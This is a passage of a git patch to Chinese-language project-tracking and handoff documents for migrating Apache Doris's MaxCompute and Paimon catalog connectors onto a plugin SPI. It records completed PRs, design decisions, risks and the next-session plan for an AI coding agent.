A–D 已合入 `branch-catalog-spi`(**#64143** squash `5c240dc7a34`);批 E(live cutover)并入 P7 | [tasks/P3](./tasks/P3-hudi-migration.md) | -| P4 | maxcompute 迁移 | 2 周 | ▰▰▰▰▰▰▰▰▱▱ 80% | 🚧 **W-phase 全落地** ✅;**Batch A+B 完成**(T01–T04 dormant);**Batch C 翻闸完成**(T05 + T06a + **T06b flip ✅** [D-027]);**Batch D 删除完成 ✅**(legacy 删 + odps 依赖彻底移除,`7a4db351100`+`409300a75b8`,全门绿);剩 push/PR | [tasks/P4](./tasks/P4-maxcompute-migration.md) | -| P5 | paimon 迁移 | 3 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | +| **P4** | maxcompute 迁移 | 2 周 | ▰▰▰▰▰▰▰▰▰▰ 100% | ✅ 完成并合入 `branch-catalog-spi`(**#64253** T01–T06 适配+翻闸 + **#64300** T07–T09 删 legacy/odps-free;含 #64119 校验迁移)| [tasks/P4](./tasks/P4-maxcompute-migration.md) | +| **P5** | paimon 迁移 | 3 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | 🔜 **下一阶段**(本 session 后启动;recon+设计先行)| —(kickoff 时建 tasks/P5)| | P6 | iceberg 迁移 | 5 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | | P7 | hive (+HMS) 迁移 | 6 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | | P8 | 收尾清理 | 2 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | -**全局进度:12%**(25 周计划中 P0+P1 共 3 周完成) +**全局进度:~32%**(25 周计划中已完成约 7.9 周:P0+P1+P2+P4 满 + P3 hybrid 45%;统一 header 与本行此前不一致的 38%/12% 旧值,改按 §一 进度条加权) --- @@ -33,7 +33,7 @@ | **es** | ✅ | ✅ 100% | ✅ | ✅ | ✅ | **100%** | [详情](./connectors/es.md) | | trino-connector | ✅ | ✅ 100% | ✅ | ✅ | ✅ | **100%** | [详情](./connectors/trino-connector.md) | | hudi | 🟡(D-005 区分符 + D-020 模型 dispatch 已设计;实现批 E)| 🟨 55%(读路径 dormant + 批 C 测试基线)| ❌(gate 关)| ❌ | 0/0(寄生 hms)| **25%** | [详情](./connectors/hudi.md) | -| maxcompute | 🟡 | ✅ 100%(翻闸 + legacy 删除完成)| ✅ **翻闸 T06b** | ✅(Batch D 已删)| ✅ 0/0(已清)| **95%** | [详情](./connectors/maxcompute.md) | +| maxcompute | ✅ | ✅ 100% | ✅ **已合入 #64253** | ✅ **#64300 已删** | ✅ 0/0 | **100%** | [详情](./connectors/maxcompute.md) | | paimon | 🟡 | 🟨 50% | ❌ | ❌ | 0/10 | **20%** | [详情](./connectors/paimon.md) | | iceberg | 🟡 | 🟥 10% | ❌ | ❌ | 0/19 | **5%** | [详情](./connectors/iceberg.md) | | hive (+hms) | 🟡 | 🟥 20% | ❌ | ❌ | 0/31 | **10%** | [详情](./connectors/hive.md) | @@ -44,7 +44,14 @@ > 状态非 ✅ 的项,按阶段聚合。详细见各阶段 task 文件。 -### P4 — maxcompute 迁移(🚧 full adopter;**设计已批准** [D-023],5 批/11 task;Batch A+B+C ✅(翻闸完成),下一步 Batch D(删 legacy + drop odps 依赖,待 live 验证)) +### P5 — paimon 迁移(🔜 下一 session 启动:recon + 设计先行) + +> 策略 = **full adopter + 翻闸**(复用 P4 样板,非 P3 hybrid)。kickoff = code-grounded recon → 设计 + 批次计划(`tasks/P5-paimon-migration.md`)→ 用户签字 → 分批实现 + 独立 commit。详见 [HANDOFF 第 19 次](./HANDOFF.md) + [paimon 连接器档](./connectors/paimon.md) + master plan [§3.6](./00-connector-migration-master-plan.md)。 +> +> **已知范围**(master §3.6 + 连接器档,待 recon 校正):① port `PaimonMetadataOps`→`PaimonConnectorMetadata`(注意 partitionStatistics / bucketing);② **6 个 catalog flavor**(HMS/DLF/REST/File/Base/Factory)连接器内工厂重组(`PaimonConnectorProvider.create()`);③ MVCC(E5 `PaimonMvccSnapshot`)/ vended creds(E6 `PaimonVendedCredentialsProvider`)/ sys-tables(E7 `PaimonSysExternalTable`)承接 P0 新增 SPI —— **paimon 是首个真正消费 E5/E6/E7 的 adopter**(MC 未用);④ 删 fe-core 重复 `PaimonPredicateConverter`(**P1-T02 推迟项,仍在** `datasource/paimon/source/`);⑤ 清 **10 处**反向 `instanceof PaimonExternal*`;⑥ 删 `datasource/paimon/`(22 顶层 + source/ + profile/)。 +> **前置风险**:R-004(classloader 打破 SDK 单例,paimon 明列)、R-007(FE/BE 共享 jar 冲突)、R-012(snapshotId 类型)。**关联决策**:D-005(HMS flavor 走 `tableFormatType`)、D-006(cache 放连接器内)。 + +### P4 — maxcompute 迁移(✅ 已完成并合入:**#64253** T01–T06 适配+翻闸 + **#64300** T07–T09 删 legacy/odps-free;含 #64119 校验迁移) > 策略 = **full adopter + 翻闸**([D-023],非 P3 hybrid);前置 W-phase(W1–W7)✅。批次计划 + 完整 task 表见 [tasks/P4](./tasks/P4-maxcompute-migration.md)。 @@ -52,9 +59,9 @@ |---|---|---|---|---| | A | 连接器 DDL + 分区 parity | 🔒 关 | P4-T01 ✅ / T02 ✅ | ✅ T01 DDL + T02 分区 listing 完成(gate 全绿:compile + checkstyle 0 + import-gate)| | B | 写/事务 SPI(`ConnectorTransaction`/`WriteOps` + `WritePlanProvider`→`TMaxComputeTableSink`)| 🔒 关 | P4-T03 ✅ / T04 ✅ | ✅ T03 写/事务 SPI(`MaxComputeConnectorTransaction`+`beginTransaction`)+ T04 写计划(`MaxComputeWritePlanProvider.planWrite`,OQ-2=Approach A)完成,gate 全绿 | -| C | 翻闸(`SPI_READY_TYPES` + GSON + `getEngine`;含 R-004 防御测)| 🔓 **live** | P4-T05/T06 | ✅ **翻闸完成**(T05 image-compat + T06a 写接线/UT + **T06b flip**,gate 全绿 [D-027]);R-004 part-2 live 待用户跑 | -| D | 清 ~30 反向引用 + 删 legacy 子系统(20 文件,收口 P1-T02)+ **drop fe-core odps 依赖** + **下沉 MCUtils/删 fe-common odps**(方案A §8)| 🔓 live | P4-T07/T08/T09 | ⏳ 方案已 finalize + @HEAD 校验(20 文件全在、linchpin residual=∅,2026-06-09);执行后 fe-core 依赖树**彻底无 odps**;**执行待用户 live ODPS 验证后**([D-027],[设计](./tasks/designs/P4-batchD-maxcompute-removal-design.md))| -| E | 连接器测试基线 + PR | — | P4-T10/T11 | ⏳ | +| C | 翻闸(`SPI_READY_TYPES` + GSON + `getEngine`;含 R-004 防御测)| 🔓 **live** | P4-T05/T06 | ✅ **已合入 #64253**(T05 image-compat + T06a 写接线/UT + T06b flip;+ T06c FE 分发补接 + T06e 红线 gap campaign G0/G2/G5/G6/G7/GC1/F9 等)| +| D | 清反向引用 + 删 legacy 子系统(20 文件,收口 P1-T02 的 Mc 部分)+ **drop fe-core odps 依赖** + **下沉 MCUtils/删 fe-common odps**(方案A §8)| 🔓 live | P4-T07/T08/T09 | ✅ **已合入 #64300**(删 20 fe-core 文件 + 清反向引用 + MCUtils 下沉 be-java-extensions;`dependency:tree \| grep odps`=∅;含 DV-021/DV-022)| +| E | 连接器测试基线 + PR | — | P4-T10/T11 | ✅ 连接器 UT 全绿(含 #64119 迁移测,101 run/0 fail/1 skip);PR #64253 + #64300 已合入 | ### P3 — hudi 迁移(🚧 hybrid,批 A–D 全部 in-scope 完成:T02/T04/T05/T07 ✅ + T06/T08 决策;T03→批 E;剩批 E→P7,**P3 已合入 #64143 `5c240dc7a34`**;批 E live cutover 并入 P7) @@ -140,6 +147,7 @@ > 倒序,新内容置顶;超过 14 天的条目移除(git log 保留历史)。 +- **2026-06-09(阶段里程碑 · P4 完成)** ✅ **P4 maxcompute 迁移全部完成并合入 `branch-catalog-spi`** —— **#64253**(T01–T06 连接器 full 适配 + live 翻闸 `SPI_READY_TYPES += "max_compute"`)+ **#64300**(T07–T09 删 20 fe-core legacy 文件 + 清反向引用 + MCUtils 下沉 be-java-extensions,`fe-core dependency:tree | grep odps`=∅,HEAD `e96037cf6aa`)。upstream PR **#64119**(MaxCompute 连接校验)功能已迁连接器 SPI(`validateMaxComputeConnection`/`checkOperationSupported`,连接器 UT 101/0/0/1)并随 #64300 squash 合入(`git log -S` 证)。fe-core **彻底无 odps**(代码 + 依赖树)。本 session = 交接文档同步(PROGRESS + HANDOFF 第 19 次),0 产线代码;**下一 session = P5 paimon 迁移 kickoff**(recon + 设计 + 批次计划,复用 P4 full-adopter 写 SPI 样板)。 - **2026-06-06(实现 ⑧·P4-T05)** ✅ **P4 Batch C 启动 — P4-T05 翻闸接线完成**(dormant、gate-green、**待 commit**,用户定时机):GsonUtils 三 GSON 注册(catalog `:397` / **db `:452`** / table `:472`)atomic 迁 `registerCompatibleSubtype`→`PluginDriven*` + 删 3 unused `maxcompute.*` import;`PluginDrivenExternalTable.getEngine`/`getEngineTableTypeName` 加 `case "max_compute"`(返 `MAX_COMPUTE_EXTERNAL_TABLE.toEngineName()`=null / `.name()`,**核 legacy 行为等价**);`legacyLogTypeToCatalogType` 仅加注释(默认分支已出 `"max_compute"`,不加 case)。**关键校正**:ordered TODO 漏 **db `:452`**——4-agent 对抗复核揪出,漏迁则翻闸后 `MaxComputeExternalDatabase.buildTableInternal:44` cast `PluginDrivenExternalCatalog`→`MaxComputeExternalCatalog` 抛 `ClassCastException`(es/jdbc/trino 均 catalog+db+table 齐迁,legacy DB 类已删);用户签字折入 T05。**复核另 2 告警判非问题**:`getMetaCacheEngine`→"default" 假阳性(plugin 路径经连接器 `initSchema` 取 schema、走 "default" 桶同 es/jdbc/trino,`MaxComputeExternalMetaCache` 仅 legacy 表引用=Batch-D 死码);`getMysqlType`→"BASE TABLE" 同 ES 既定行为(`ES_EXTERNAL_TABLE` 亦不在 `toMysqlType` switch,迁后同样 null→"BASE TABLE" 已 ship);dormancy 告警=既载中间态 caveat(其"留 registerSubtype"修法错=撞 duplicate-label IAE)。UT `PluginDrivenExternalTableEngineTest` +2 max_compute 例(9/9)。守门全绿(fe-core compile BUILD SUCCESS + checkstyle 0 + import-gate 0 + UT 9-0-0,真实 EXIT 核验)。详见设计 §3.4 / [D-026 校正]。**下一 = T06a(写接线 W-a..d + 静态分区/overwrite 绑定 + R-004 隔离 UT,dormant)→ T06b(flip)**。⚠️ T05↔flip 中间态不可部署(compat 已注册但 factory 仍 legacy)。 - **2026-06-06(设计 ⑤·Batch C)** ✅ **P4 Batch C 翻闸设计完成 + 用户签字 [D-026]**(design-only,零代码):用户选 "Design Batch C first"。4 路 Explore re-verify recon 锚点 + 主线核读 executor/txn 生命周期,出 [翻闸设计](./tasks/designs/P4-T05-T06-cutover-design.md)(verified file:line + 5 gap G1–G5 + 写生命周期顺序 + R-004 两分测 + ordered TODO)。**3 决策签字**:D-1 capability signal=新增 `ConnectorWriteOps.usesConnectorTransaction()` flag(MC=true,否决 writePlanProvider 代理/复用 ConnectorWriteType);D-2 两 commit、flip 末(`[P4-T06a]` 接线 dormant + `[P4-T06b]` flip);D-3 静态分区/overwrite 绑定入 cutover(避 INSERT OVERWRITE PARTITION 翻闸回归)。**2 SPI 新增**(default-preserving,零 jdbc/es/trino 影响):`ConnectorSession.setCurrentTransaction` + `ConnectorWriteOps.usesConnectorTransaction`(impl 时 E11 登记)。**recon 校正**:GsonUtils 真锚 :397/:472(非 ~405/~478);`legacyLogTypeToCatalogType` 默认分支已出 "max_compute"(无需加 case);live executor=`PluginDrivenInsertExecutor`(现走 JDBC insert-handle 模型,对 MC `getWriteConfig`/`beginInsert`/`finishInsert` 全 throwing-default=直跑必抛);`PluginDrivenTransactionManager.begin(connectorTx):71-77` 未 putTxnById(G3);`UnboundConnectorTableSink` 不携静态分区(G4)。**下一 = 实现 T05(dormant)→ T06(live, 两 commit)**。 - **2026-06-06(实现 ⑦·P4-T04)** ✅ **P4 Batch B 收尾 — P4-T04 连接器写计划完成 = Batch A+B 全完成**(gate 关、dormant、零 live 风险):新建 `MaxComputeWritePlanProvider implements ConnectorWritePlanProvider`,`planWrite` 走 **OQ-2 = Approach A**(finalizeSink 一处:建 ODPS Storage API 写 session → `session.getCurrentTransaction()`→`MaxComputeConnectorTransaction.setWriteSession` 绑事务 → 盖 `TMaxComputeTableSink` 静态字段 + `static_partition_spec` + `partition_columns`(ODPS 表列) + `write_session_id` + `txn_id`;**无运行期注入 hook**,legacy `MCInsertExecutor.beforeExec` 注入消失)。**5 决策 [D-025]**(D-1/D-2a 签字、D-3/D-4/D-5 主线定):D-3 抽 `MaxComputeDorisConnector.getSettings()`(决定性证据=legacy catalog 单 `settings` 同供 scan+write,抽出=忠实港非投机重构;scan provider :146-162 上移共用);D-4 `supportsInsert()`=true 余 throwing-default(实际 executor 面待 Batch C);fe-core seam(D-2a)`PluginDrivenTableSink.bindViaWritePlanProvider(insertCtx)` 读 overwrite+静态分区,`staticPartitionSpec` 加 `PluginDrivenInsertCommandContext`(非基类,避 `MCInsertCommandContext` shadow)。**坑10 javap 全核**(`withMaxFieldSize(long)`/`.partition`/`.overwrite`/`.withDynamicPartitionOptions`/`buildBatchWriteSession`throws IOException/`DynamicPartitionOptions.createDefault`/`PartitionSpec(String)`/`getId`);写路径 ArrowOptions = **MILLI/MILLI**(≠scan MILLI/MICRO)。**偏差 [DV-012]**:`partition_columns` 取 ODPS 表列(源不同值同)。binding 期填充 staticPartitionSpec/overwrite 仍 dormant 归 Batch C/D(坑3,`InsertIntoTableCommand:598` 现传空 ctx)。守门全绿(`-pl :fe-connector-maxcompute,:fe-core -am` compile BUILD SUCCESS/MVN_EXIT=0 + checkstyle 0 + import-gate 0,真实 EXIT 核验)。单测延 **P4-T10**。**T04 不新增 SPI 面**。**下一步 = Batch C 翻闸**(唯一 live 切点,A+B 全绿 ✅ + 前置 R-004 防御测)。 @@ -202,8 +210,8 @@ | 类型 | 总数 | 最新条目 | 文档 | |---|---|---|---| -| **决策**(D-NNN) | 25 | D-025(P4-T04 写计划 5 决策:OQ-2=Approach A / D-2a seam fill / D-3 抽 `getSettings()` / D-4 `supportsInsert` / D-5 静态分区 map);D-024(P4-T03 两 fork)| [decisions-log.md](./decisions-log.md) | -| **偏差**(DV-NNN) | 12 | DV-012(P4-T04 `partition_columns` 取 ODPS 表列,源不同值同);DV-011(P4-T03 block 上限常量)| [deviations-log.md](./deviations-log.md) | +| **决策**(D-NNN) | 36 | D-036(P4-T06e FIX-CAST-PUSHDOWN:MC 关 CAST 谓词下推 + 剥壳抑制 source LIMIT,修 F9 静默丢行回归);D-035(FIX-BATCH-MODE-SPLIT 通用 batch SPI 路径);D-034(FIX-POSTCOMMIT-REFRESH swallow)| [decisions-log.md](./decisions-log.md) | +| **偏差**(DV-NNN) | 22 | DV-022(P4-T09 fe-common 去 odps 暴露隐藏传递依赖→显式补 netty/protobuf);DV-021(Batch-D 删后 4 条 Tier-3 接受项 GAP3/4/9/10)| [deviations-log.md](./deviations-log.md) | | **风险**(R-NNN) | 14 | R-014(thrift sink 选择灵活性) | [risks.md](./risks.md) | --- @@ -212,9 +220,9 @@ > 当本项目通过 Claude Code 这类 LLM agent 推进时,跟踪当前 session 状态、handoff 状况和 context 健康度。 -- **本 session 已完成**:**P4-T04 连接器写计划**(Batch B 收尾 = A+B 全完成,gate 关、dormant、零 live 风险)——新建 `MaxComputeWritePlanProvider.planWrite`(**OQ-2=Approach A**:finalizeSink 一处建写 session + `setWriteSession` 绑 txn + 盖 `txn_id`/`write_session_id`,无运行期注入)+ `MaxComputeDorisConnector.getSettings()`/`getWritePlanProvider()` + `supportsInsert()`=true + fe-core seam(`bindViaWritePlanProvider(insertCtx)` + `PluginDrivenInsertCommandContext.staticPartitionSpec`)。5 决策 [D-025];偏差 [DV-012](partition_columns 源)。守门全绿(compile BUILD SUCCESS + checkstyle 0 + import-gate 0,真实 EXIT)。测试延 P4-T10。设计 [P4-T04 doc](./tasks/designs/P4-T04-write-plan-design.md)。 -- **下一个 session 应做**:**Batch C 翻闸**(唯一 live 切点;前置 = A+B 全绿 ✅ + R-004 ODPS classloader 防御测)——P4-T05 GsonUtils `registerCompatibleSubtype` + `PluginDrivenExternalTable.getEngine`/`legacyLogTypeToCatalogType` 加 `max_compute`;P4-T06 `SPI_READY_TYPES += "max_compute"` + 删 `CatalogFactory` case + **executor 接线**(`beginTransaction`→`begin(connectorTx)` + 置 `ConnectorSessionImpl.setCurrentTransaction`)+ `GlobalExternalTransactionInfoMgr` 注册 + binding 期填 `PluginDrivenInsertCommandContext` overwrite/静态分区(T03/T04 dormant 的 live 化,坑3)。见 [tasks/P4](./tasks/P4-maxcompute-migration.md) / [HANDOFF](./HANDOFF.md)。 -- **是否需要 handoff**:**是**——本场已 rewrite [HANDOFF.md](./HANDOFF.md)(P4-T04 完成 + Batch C 翻闸首步锚点 + dormant→live 接线清单 + 守门坑沿用) +- **本 session 已完成**:**交接文档同步(P4 完成里程碑)** —— 核实 P4 全部合入(#64253 T01–T06 + #64300 T07–T09,含 #64119 校验迁移;fe-core 代码 + 依赖树彻底无 odps;分支 `branch-catalog-spi` 干净)后,更新 PROGRESS(§header / §一 P4→100% + P5 标「下一阶段」/ §二看板 maxcompute 100% / §三 P4 收尾 + **新增 P5 kickoff 块** / §四里程碑 / §六 D-036·DV-022 计数纠正 / §七)+ rewrite HANDOFF(第 19 次)。**无产线代码改动。** +- **下一个 session 应做**:**P5 paimon 迁移 kickoff** —— code-grounded recon(连接器模块现状 / fe-core footprint / 6 catalog flavor / MVCC·vended·sys-tables 即 E5/E6/E7 / 10 处反向 instanceof / 复用 P4 写 SPI)→ 写 `tasks/P5-paimon-migration.md`(设计 + 批次计划)→ 用户签字 → 分批实现。起点材料见 [HANDOFF 第 19 次](./HANDOFF.md) + [paimon 档](./connectors/paimon.md) + master [§3.6](./00-connector-migration-master-plan.md)。 +- **是否需要 handoff**:**是**——本场已 rewrite [HANDOFF.md](./HANDOFF.md)(第 19 次:P4 完成确认 + P5 kickoff 起点 + paimon 范围/风险/材料清单)。 - **协作规范**:[AGENT-PLAYBOOK.md](./AGENT-PLAYBOOK.md)(context 预算、subagent 使用、handoff 触发条件) --- From cab27251ba1a92f65304db444308eacfcb387f47 Mon Sep 17 00:00:00 2001 From: morningman Date: Tue, 9 Jun 2026 20:16:53 +0800 Subject: [PATCH 008/128] =?UTF-8?q?[doc](connector)=20P5=20paimon=20recon?= =?UTF-8?q?=20+=20=E8=AE=BE=E8=AE=A1=20+=20plan-doc=20=E5=90=8C=E6=AD=A5?= =?UTF-8?q?=EF=BC=88design-only=EF=BC=8C0=20=E4=BA=A7=E7=BA=BF=E4=BB=A3?= =?UTF-8?q?=E7=A0=81=EF=BC=89?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 本 session 仅调研+设计。14-agent code-grounded recon + cross-cut 对抗复审, 覆盖 paimon 5 功能区(普通读/系统表/procedure/DDL/mtmv)旧框架实现 → 映射新 catalog SPI → 对齐 maxcompute 连接器接口一致性。 新增: - research/p5-paimon-migration-recon.md: 5 区旧实现 + E1–E10 SPI 状态 + 跨切面风险 + MC 一致性 11 约定 + 测试基线 - tasks/P5-paimon-migration.md: old→new 映射 + 30 TODO/B0–B9 批 + 批次依赖图 + 验收标准 用户签字决策: - D-037 (P5-D1): flavor=单 Catalog + createCatalog flavor switch(MC 一致, 不建 backend 模块——5 个 backend 模块是空壳) - D-038 (P5-D2): MTMV/MVCC 桥 P5 内实现(fe-core PaimonPluginDrivenExternalTable), 翻闸 gated on 它,禁静默读 latest 回归 证伪 3 先验: backend 模块空壳(连接器走单 Catalog stub)/ FE 分发部分已预接 (残留=连接器 listPartitions)/ Base64 非 blocker(BE 有 STD fallback)。 procedure 区=零可迁 doc-only。 doc 同步: connectors/paimon.md(修 3 stale 表述)、decisions-log.md(+D-037/D-038, 36→38)、PROGRESS.md(header/§一/§二/§三/§四/§六/§七)、HANDOFF.md(覆盖,不留折叠历史)。 Co-Authored-By: Claude Opus 4.8 (1M context) --- plan-doc/HANDOFF.md | 435 ++---------------- plan-doc/PROGRESS.md | 25 +- plan-doc/connectors/paimon.md | 37 +- plan-doc/decisions-log.md | 2 + .../research/p5-paimon-migration-recon.md | 143 ++++++ plan-doc/tasks/P5-paimon-migration.md | 209 +++++++++ 6 files changed, 420 insertions(+), 431 deletions(-) create mode 100644 plan-doc/research/p5-paimon-migration-recon.md create mode 100644 plan-doc/tasks/P5-paimon-migration.md diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index 3b46b6cf5b1433..3b1191bcb5fad4 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -1,428 +1,51 @@ # 🤝 Session Handoff -> 滚动文档:每次 session 结束覆盖更新;历史见 `git log plan-doc/HANDOFF.md`。 +> 滚动文档:每次 session 结束**直接覆盖**(不保留历史;历史见 `git log plan-doc/HANDOFF.md`)。 > 协作规范:[AGENT-PLAYBOOK.md](./AGENT-PLAYBOOK.md) --- -# 🔥 第 19 次 handoff(2026-06-09,覆盖)— 🎉 P4 maxcompute 全部完成并合入;下一 session = P5 paimon 迁移 kickoff +# 🔥 2026-06-09 — P5 paimon recon + 设计完成;下一步 = 分批实现(B0 起) -> **本 session**:用户确认「P4(maxcompute)已完成、HANDOFF 中所有 maxcompute TODO 已做完」,要求同步交接文档(PROGRESS + HANDOFF)并为下一 session 启动 **P5 paimon 迁移**做准备。**本 session 仅文档同步,0 产线代码。** - -## ✅ P4 完成核实(code-grounded,本 session 亲核) -- **翻闸已合入**:`max_compute` ∈ `CatalogFactory.SPI_READY_TYPES`(PR **#64253** "P4 maxcompute connector full adoption + live cutover (T01–T06)")。 -- **legacy 已删 + odps-free**:`fe-core/.../datasource/maxcompute/` 不存在;`grep com.aliyun.odps fe-core/src/main/java`=∅(PR **#64300** "remove legacy subsystem + make fe-core odps-free (T07–T09)",HEAD `e96037cf6aa`)。 -- **#64119 校验迁移已合入**:连接器含 `validateMaxComputeConnection`/`checkOperationSupported`;`git log -S validateMaxComputeConnection` 证其随 **#64300** squash 合入 —— 即上一次(第 18 次)handoff 的 10 文件工作已落地,无悬空。 -- **分支干净**:当前 `branch-catalog-spi`,HEAD=`e96037cf6aa`(#64300);`git status` 仅未跟踪 scratch(`.audit-scratch/`/`conf.cmy/`/`*.bak`/`.claude/scheduled_tasks.lock`)。 -- ⚠️ 仍有遗留 stash `stash@{0}`("WIP on branch-catalog-spi: ... #64253")—— 本 session 未动;如确认无用可由用户 `git stash drop stash@{0}`。 - -## ✅ 本 session 已完成(文档同步) -- **PROGRESS.md**:§header(P4 完成→P5 待启动 + 进度统一 ~32%);§一(P4 100%✅ / P5 标「下一阶段」);§二看板(maxcompute 100%);§三(P4 收尾为「已合入 #64253+#64300」+ **新增 P5 kickoff 块**:范围/风险/材料);§四(加 2026-06-09 P4 完成里程碑);§六(决策计数 25→**36**、偏差 12→**22** 纠正,此前严重 stale);§七(session 状态)。 -- **HANDOFF.md**:本第 19 次 + 折叠第 18 次(标注「已随 #64300 合入」)。 - -## 🎯 下一 session = P5 paimon 迁移 kickoff(用户定) -> **策略 = full adopter + 翻闸**(复用 P4 样板,非 P3 hybrid)。P4 已交付可复用的**写/事务 SPI**(`ConnectorTransaction`/`ConnectorWritePlanProvider`/`PluginDrivenTransaction`/`PluginDrivenInsertExecutor`)+ full-adopter + cutover 流程范本。 - -**kickoff 步骤**(沿用 P2/P3/P4:recon → 设计 → 用户签字 → 分批实现): -1. **code-grounded recon**(多 Agent + 亲核,Rule 8)—— 产 `research/p5-paimon-migration-recon.md`: - - 连接器模块 `fe-connector-paimon/` 现状(10 文件:scan/predicate/handle 完整;`ConnectorMetadata` 部分实现;catalog flavor / MVCC / vended / sys-tables 缺)。 - - fe-core footprint:`datasource/paimon/`(22 顶层 + source/5 + profile/2);**反向 instanceof 10 处**(`PhysicalPlanTranslator` 的 `PAIMON_EXTERNAL_TABLE` 分支等)。 - - **6 个 catalog flavor**(HMS/DLF/REST/File/Base/Factory)—— 连接器内工厂重组 `PaimonConnectorProvider.create()` 按 properties 实例化 paimon `Catalog`。 - - **复用面**:P0 已建 `ConnectorMvccSnapshot`(E5) / vended-creds(E6) / sys-tables(E7) SPI —— **paimon 是首个真正消费 E5/E6/E7 的 adopter**(MC 未用,无先例,须重点核)。BE 经 JNI 调 paimon-reader,序列化 `Table` 经 `ConnectorScanPlanProvider.getSerializedTable` 已支持。 - - **P1-T02 推迟项**:fe-core 重复 `PaimonPredicateConverter`(**仍在** `datasource/paimon/source/PaimonPredicateConverter.java:43`,连接器侧另有一份)—— P5 删 fe-core 版。 -2. **写设计 + 批次计划** `tasks/P5-paimon-migration.md`(连接器档约定「P5 待启动时建」)。 -3. **用户签字** → 分批落地、独立 commit、每批守门。 - -**已知特殊性 / 风险**(master §3.6 line 218 + 连接器档 + risks): -- **R-004**(classloader 隔离打破 SDK 单例,**paimon 明列**)+ **R-007**(FE/BE 共享 jar 冲突)+ **R-012**(snapshotId 类型)—— P5/P6 触发窗口,recon 须评估(auto-memory [[catalog-spi-be-java-ext-shared-classpath]] 有共享类路径模型)。 -- **关联决策**:D-005(HMS flavor 走 `tableFormatType`,P3-T08 已细化 per-table `getScanPlanProvider`)、D-006(cache 放连接器内)。 -- paimon-HMS-flavor 复用 `fe-connector-hms`(P3 已建、稳定)。 - -**起点材料**:[paimon 连接器档](./connectors/paimon.md)、master plan [§3.6](./00-connector-migration-master-plan.md)、[P4 task 档](./tasks/P4-maxcompute-migration.md)(full-adopter 样板)、写 SPI RFC `tasks/designs/connector-write-spi-rfc.md`、[AGENT-PLAYBOOK](./AGENT-PLAYBOOK.md)。 - -## ⚙️ 操作须知(复用) -- maven 必绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml` + `-pl : -am` + `-Dmaven.build.cache.enabled=false`;改连接器 `:fe-connector-paimon`、改 SPI `:fe-connector-api`(须 -am 连带 rebuild)、改 fe-core `:fe-core`。读真实 `Tests run:`/`BUILD`,勿信后台 echo exit([[doris-build-verify-gotchas]])。 -- 连接器**禁 import fe-core**(import-gate `bash tools/check-connector-imports.sh`)—— 需 fe Config/session 值经 session-property 透传([[catalog-spi-connector-session-tz-gotcha]])。 -- 连接器测试模块**无 mockito**(纯 seam / child-first loader,[[catalog-spi-fe-core-test-infra]])。 -- 分支 `branch-catalog-spi`(HEAD #64300);P5 建议 off 最新 upstream 起新分支。未跟踪 scratch 勿提交。 - -## 🧠 给下一个 agent 的 meta -- **P4 是 full-adopter + cutover 的完整样板** —— P5 复用其写 SPI + 流程;但 paimon 多了 **6 catalog flavor 工厂** + **首次真正用 E5/E6/E7(MVCC/vended/sys-tables)**,recon 须重点核这两块(MC 无先例)。 -- **live e2e 仍是翻闸真正完成门**(CI 跳)—— P5 翻闸前同样需用户真实 paimon 环境验证。 -- **翻闸时 GSON 三注册须 atomic 齐迁**(catalog+db+table,[[catalog-spi-gson-migrate-all-three]],漏 db 致 ClassCastException);**每个 full-adopter 都要补 FE 分发缺口**(DROP TABLE / CREATE·DROP DB / SHOW PARTITIONS / partitions TVF,[[catalog-spi-cutover-fe-dispatch-gap]])。 -- auto-memory:连接器禁 import fe-core([[catalog-spi-connector-session-tz-gotcha]]);测基建无 fe-core/无 mockito([[catalog-spi-fe-core-test-infra]]);clean-room 对抗复审偏好([[clean-room-adversarial-review-pref]]);构建坑([[doris-build-verify-gotchas]])。 - ---- - -
📅 历史:第 18 次 handoff(2026-06-09)— PR #64119 MaxCompute 校验迁移 SPI DONE(10 文件已随 #64300 合入) - -# 🔥 第 18 次 handoff(2026-06-09,覆盖)— PR #64119(MaxCompute test_connection 校验 + 外表/视图 read·write 拒绝)迁移 SPI DONE,连接器 UT 全绿 - -> **本 session**:用户要求把 upstream PR apache/doris#64119(`[fix](fe) Improve MaxCompute catalog validation`,11 文件/+422)的功能完整迁移到 SPI 框架,并跑通其 3 个单元测试。PR 改的 fe-core 类(`MaxComputeExternalCatalog`/`MaxComputeExternalTable`/`MCTransaction`/`MaxComputeScanNode`)在本 fork 已于 P4 删除→连接器化,故为真迁移。**用户定夺**:① 范围 = surgical(补 A + 加 C,B/D 已在不动);② 测试 = fold 进现有连接器测试文件。 - -## ✅ 本 session 已完成(4 main + 3 test,全门绿,本地未 commit) - -- **Gap 分析(关键发现)**:PR 4 行为里 **(B) REST 超时**(`MaxComputeDorisConnector.buildSettings` RestOptions)与 **(D) split_byte_size 报错文案**(`MaxComputeConnectorProvider:82` 已用 `SPLIT_BYTE_SIZE`,G6 已修)**早已在 fork**;**(A) test_connection 连通性校验**仅 stub(`testConnection()` 调 `odps.projects().exists()` 但**丢返回值**、**无 namespace-schema 分支**);**(C) 外表/逻辑视图 read+write 拒绝**完全缺失。→ 实际新工 = 补全 A + 实现 C。 -- **(A) 补全 `MaxComputeDorisConnector.testConnection()`**:加 `enableNamespaceSchema` 字段(doInit 赋值);改调 `validateMaxComputeConnection()`——`enableNamespaceSchema ?` schema 校验(`odps.schemas().iterator(project).hasNext()`) `:` project 校验(`odps.projects().exists(project)` **查返回值**);4 个 protected seam 镜像 PR 的 `MaxComputeExternalCatalog`。失败经 `ConnectorTestResult.failure(msg)`,由 `PluginDrivenExternalCatalog.checkWhenCreating`(已有 TEST_CONNECTION 闸 + testConnection wiring)包成 DdlException。MC 默认 test_connection=false(不 override `defaultTestConnection()`)。 -- **(C) 外表/视图拒绝**:`MaxComputeTableHandle.checkOperationSupported(...)`(实例 + 静态纯守卫,throw `DorisConnectorException("{Reading|Writing} MaxCompute external table or logical view is not supported: db.name")`),接入 `MaxComputeScanPlanProvider.planScan:187`("Reading",所有读路径汇入此 